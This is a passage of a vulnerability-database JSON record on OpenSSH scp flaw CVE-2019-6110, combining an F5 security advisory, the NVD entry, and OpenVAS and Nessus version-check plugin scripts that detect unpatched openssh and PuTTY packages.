{"id": "F5:K42531048", "bulletinFamily": "software", "title": "OpenSSH vulnerability CVE-2019-6110", "description": "\nF5 Product Development has assigned ID 757604 (BIG-IP), ID 757604-8 (BIG-IQ), ID 757604-9 (Enterprise Manager), ID 757604-10 (F5 iWorkflow), and CPF-25054 and CPF-25055 (Traffix) to this vulnerability. Additionally, [BIG-IP iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H42531048 on the **Diagnostics** &gt; **Identified** &gt; **Low** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 - 14.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \n13.x | 13.0.0 - 13.1.1 | None \n12.x | 12.1.0 - 12.1.4 | None \n11.x | 11.5.1 - 11.6.3 | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \nBIG-IQ Centralized Management | 6.x | 6.0.0 - 6.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \n5.x | 5.0.0 - 5.4.0 | None \nF5 iWorkflow | 2.x | 2.3.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \n4.x | 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nThere is no mitigation for a man-in-the-middle (MITM) attack.\n\nYou can mitigate the vulnerability from a malicious server by verifying the host key fingerprint when connecting to systems with the SCP client.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K31781390: January 2019 OpenSSH security vulnerabilities](<https://support.f5.com/csp/article/K31781390>)\n", "published": "2019-01-18T00:07:00", "modified": "2019-02-20T02:12:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}, "href": "https://support.f5.com/csp/article/K42531048", "reporter": "f5", "references": [], "cvelist": ["CVE-2019-6110"], "type": "f5", "lastseen": "2020-04-06T22:39:32", "edition": 1, "viewCount": 120, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-6110"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97", "EXPLOITPACK:98FE96309F9524B8C84C508837551A19"]}, {"type": "nessus", "idList": ["SUSE_SU-2019-0125-1.NASL", "OPENSUSE-2019-91.NASL", "OPENSUSE-2019-93.NASL", "SUSE_SU-2019-0126-1.NASL", "GENTOO_GLSA-201903-16.NASL", "SUSE_SU-2019-0132-1.NASL", "PHOTONOS_PHSA-2019-2_0-0165_OPENSSH.NASL", "NEWSTART_CGSL_NS-SA-2019-0060_OPENSSH.NASL", "SUSE_SU-2019-13931-1.NASL", "PHOTONOS_PHSA-2019-1_0-0237_OPENSSH.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-32009"]}, {"type": "exploitdb", "idList": ["EDB-ID:46516", "EDB-ID:46193"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151227"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310852256", "OPENVAS:1361412562310852264", "OPENVAS:1361412562310814661"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0093-1", "OPENSUSE-SU-2019:0091-1"]}, {"type": "thn", "idList": ["THN:445A5A09D3930F981A45FE5AFA1E4CEC"]}, {"type": "gentoo", "idList": ["GLSA-201903-16"]}, {"type": "f5", "idList": ["F5:K31781390"]}, {"type": "symantec", "idList": ["SMNTC-1756"]}, {"type": "aix", "idList": ["OPENSSH_ADVISORY13.ASC"]}], "modified": "2020-04-06T22:39:32", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2020-04-06T22:39:32", "rev": 2}, "vulnersScore": 7.1}, "affectedSoftware": []}

{"cve": [{"lastseen": "2021-02-02T07:13:03", "description": "In OpenSSH 7.9, due to accepting and displaying arbitrary stderr output from the server, a malicious server (or Man-in-The-Middle attacker) can manipulate the client output, for example to use ANSI control codes to hide additional files being transferred.", "edition": 7, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.2}, "published": "2019-01-31T18:29:00", "title": "CVE-2019-6110", "type": "cve", "cwe": ["CWE-838"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6110"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:winscp:winscp:5.13", "cpe:/a:openbsd:openssh:7.9", "cpe:/a:netapp:ontap_select_deploy:-", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:netapp:element_software:-"], "id": "CVE-2019-6110", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6110", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:netapp:element_software:-:*:*:*:*:*:*:*", "cpe:2.3:a:winscp:winscp:5.13:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:7.9:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:ontap_select_deploy:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:32:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-6109", "CVE-2019-6110"], "description": "The host is installed with PuTTY and is\n prone to multiple spoofing vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2019-01-17T00:00:00", "id": "OPENVAS:1361412562310814661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814661", "type": "openvas", "title": "PuTTY SCP Multiple Spoofing Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PuTTY SCP Multiple Spoofing Vulnerabilities (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:putty:putty\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814661\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2019-6109\", \"CVE-2019-6110\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-17 15:17:22 +0530 (Thu, 17 Jan 2019)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_name(\"PuTTY SCP Multiple Spoofing Vulnerabilities (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with PuTTY and is\n prone to multiple spoofing vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A missing character encoding in the progress display, the object name\n can be used to manipulate the client output.\n\n - Accepting and displaying arbitrary stderr output from the scp server, a\n malicious server can manipulate the client output.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n servers to spoof the client output.\");\n\n script_tag(name:\"affected\", value:\"PuTTY version 0.70 and earlier on Windows.\");\n\n script_tag(name:\"solution\", value:\"Update to version 0.71 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\");\n script_xref(name:\"URL\", value:\"https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/pscp-unsanitised-server-output.html\");\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_putty_portable_detect.nasl\");\n script_mandatory_keys(\"putty/version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nputVer = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:putVer, test_version:\"0.71\")) {\n report = report_fixed_ver(installed_version:putVer, fixed_version:\"0.71\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-31T16:53:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-01-30T00:00:00", "id": "OPENVAS:1361412562310852264", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852264", "type": "openvas", "title": "openSUSE: Security Advisory for openssh (openSUSE-SU-2019:0093-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852264\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-01-30 04:04:25 +0100 (Wed, 30 Jan 2019)\");\n script_name(\"openSUSE: Security Advisory for openssh (openSUSE-SU-2019:0093-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0093-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-01/msg00041.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the openSUSE-SU-2019:0093-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for openssh fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2018-20685: Fixed an issue where scp client allows remote SSH\n servers to bypass intended access restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate terminal output via the object name,\n e.g. by inserting ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate stderr output, e.g. by inserting ANSI\n escape sequences (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would allow malicious\n remote SSH servers to execute directory traversal attacks and overwrite\n files (bsc#1121821)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-93=1\");\n\n script_tag(name:\"affected\", value:\"openssh on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass-gnome\", rpm:\"openssh-askpass-gnome~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass-gnome-debuginfo\", rpm:\"openssh-askpass-gnome-debuginfo~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-cavs\", rpm:\"openssh-cavs~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-cavs-debuginfo\", rpm:\"openssh-cavs-debuginfo~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debugsource\", rpm:\"openssh-debugsource~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-fips\", rpm:\"openssh-fips~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-helpers\", rpm:\"openssh-helpers~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-helpers-debuginfo\", rpm:\"openssh-helpers-debuginfo~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-01-31T16:47:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-01-29T00:00:00", "id": "OPENVAS:1361412562310852256", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852256", "type": "openvas", "title": "openSUSE: Security Advisory for openssh (openSUSE-SU-2019:0091-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852256\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-01-29 04:02:12 +0100 (Tue, 29 Jan 2019)\");\n script_name(\"openSUSE: Security Advisory for openssh (openSUSE-SU-2019:0091-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0091-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-01/msg00036.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the openSUSE-SU-2019:0091-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for openssh fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-20685: Fixed an issue where scp client allows remote SSH\n servers to bypass intended access restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate terminal output via the object name,\n e.g. by inserting ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate stderr output, e.g. by inserting ANSI\n escape sequences (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would allow malicious\n remote SSH servers to execute directory traversal attacks and overwrite\n files (bsc#1121821)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-91=1\");\n\n script_tag(name:\"affected\", value:\"openssh on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-cavs\", rpm:\"openssh-cavs~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-cavs-debuginfo\", rpm:\"openssh-cavs-debuginfo~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debugsource\", rpm:\"openssh-debugsource~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-fips\", rpm:\"openssh-fips~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-helpers\", rpm:\"openssh-helpers~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-helpers-debuginfo\", rpm:\"openssh-helpers-debuginfo~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass-gnome\", rpm:\"openssh-askpass-gnome~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass-gnome-debuginfo\", rpm:\"openssh-askpass-gnome-debuginfo~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "nessus": [{"lastseen": "2021-02-01T01:09:51", "description": "An update of the openssh package has been released.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-24T00:00:00", "title": "Photon OS 2.0: Openssh PHSA-2019-2.0-0165", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-13259", "CVE-2019-6110"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:openssh", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2019-2_0-0165_OPENSSH.NASL", "href": "https://www.tenable.com/plugins/nessus/126107", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2019-2.0-0165. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126107);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/06/26 10:34:07\");\n\n script_cve_id(\"CVE-2019-6110\");\n script_bugtraq_id(106836);\n\n script_name(english:\"Photon OS 2.0: Openssh PHSA-2019-2.0-0165\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openssh package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-165.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13259\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"openssh-7.5p1-14.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"openssh-clients-7.5p1-14.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"openssh-debuginfo-7.5p1-14.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"openssh-server-7.5p1-14.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T01:09:17", "description": "An update of the openssh package has been released.", "edition": 17, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-06-25T00:00:00", "title": "Photon OS 1.0: Openssh PHSA-2019-1.0-0237", "type": "nessus", "bulletinFamily": "scanner", 